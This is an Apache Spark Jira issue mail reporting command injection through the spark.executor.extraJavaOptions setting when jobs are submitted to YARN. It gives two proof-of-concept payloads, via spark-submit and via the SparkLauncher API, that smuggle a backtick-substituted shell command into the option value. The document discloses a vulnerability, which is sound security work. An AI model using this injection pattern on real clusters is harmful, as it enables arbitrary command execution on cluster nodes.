Zijie created SPARK-50239:
-----------------------------
Summary: JavaOptions Injection Issue
Key: SPARK-50239
URL: https://issues.apache.org/jira/browse/SPARK-50239
Project: Spark
Issue Type: Improvement
Components: Spark Submit, YARN
Affects Versions: 3.5.1
Reporter: Zijie
* Attack Path
!image-2024-11-06-11-43-13-321.png|width=285,height=315!
* How to attack?
When yarn submits a task, I put a command-injection string on a parameter named
"spark.executor.extraJavaOptions"
!image-2024-11-06-14-35-49-525.png|width=485,height=258!
There are two ways to submit parameters:
# Using command lines:spark-submit --class JavaWordCount --master yarn
--deploy-mode client --conf
spark.executor.extraJavaOptions="\`touch\$IFS/tmp/zzz123\`" test.jar
# Using java API:sparkLauncher.setConf("spark.executor.extraJavaOptions",
"`touch$IFS/tmp/zzz123`");
We may find command-injection logs in hadoop:
!image-2024-11-06-14-43-46-128.png|width=495,height=298!
*How to exploit?*
!image-2024-11-06-14-46-16-914.png|width=445,height=42!
I found the vulnerability exposed in code:
!image-2024-11-06-14-50-06-477.png|width=535,height=292!
CVSS score:
!image-2024-11-06-14-56-36-042.png|width=562,height=175!
--
This message was sent by Atlassian Jira
(v8.20.10#820010)
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]
